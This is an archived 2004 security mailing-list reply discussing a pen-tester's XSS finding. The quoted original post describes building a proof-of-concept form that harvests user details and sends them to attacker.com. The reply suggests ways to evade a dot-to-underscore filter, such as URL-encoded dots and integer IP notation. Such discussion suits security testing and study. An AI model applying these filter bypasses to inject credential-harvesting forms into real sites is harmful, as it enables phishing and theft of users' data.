WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "Michael Silk" <michaels () phg com au>
Date: Tue, 1 Jun 2004 10:07:49 +1000
Well, In the old days, an ip (127.0.0.1) used to be able to be replaced for the expanded notation (127 * 2^24 + 0^16 + 0^8 + 1), perhaps check if that still works (althought I seem to remember it doesn't). Other than that (and possible dns infiltration) consider sites that, upon invalid domain (http://yahoo?test@hello) redirect to somewhere else ... even some search sites ... i.e. perhaps you could execute a search which your malicious site (attacker.com) would make note of. Or ... you say you tried hex encoding ... i.e. this ? if result is: <form target="INPUT GOES HERE"> INPUT GOES HERE could be ... ------------------------------------- http://www%2egoogle%2ecom ------------------------------------- If the % get's translated at the time of sending to the site, hex-encode that because the above is *exactly* what should appear in the source of the form tag, not the decoded result. -- Michael -----Original Message----- From: Calum Power [mailto:enune () fribble net] Sent: Saturday, 29 May 2004 2:49 PM To: webappsec () securityfocus com Subject: Fullstop Substitution in XSS Hi all, As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_). Now, I'm trying trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any: <form target="http://attacker.com/path/to/script"> is of course being filtered into: <form target="http://attacker_com/path/to/script"> Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously). Any help would be appreciated. Cheers, Calum -- Calum Power Cultural Jammer Security Enthusiast Hopeless Cynic enune () fribble net http://www.fribble.net This email message and accompanying data may contain information that is confidential and/or subject to legal privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying of this message or data is prohibited. If you have received this email message in error, please notify us immediately and erase all copies of this message and attachments. This email is for your convenience only, you should not rely on any information contained herein for contractual or legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by authorised persons.
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)